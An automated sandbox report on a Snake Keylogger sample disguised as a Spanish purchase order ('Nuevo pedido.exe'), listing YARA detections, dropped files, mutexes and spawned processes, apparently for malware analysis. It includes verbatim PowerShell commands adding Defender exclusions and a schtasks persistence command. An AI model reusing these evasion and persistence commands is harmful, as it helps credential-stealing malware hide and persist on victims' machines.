                  Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Nuevo pedido.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: QGVhHsAOjb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@3/4
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeFile created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMutant created: \Sessions\1\BaseNamedObjects\eTndfbsPx
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeFile created: C:\Users\user\AppData\Local\Temp\tmp56AD.tmpJump to behavior
                  Source: Nuevo pedido.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Nuevo pedido.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Nuevo pedido.exeReversingLabs: Detection: 44%
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeFile read: C:\Users\user\Desktop\Nuevo pedido.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp"
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
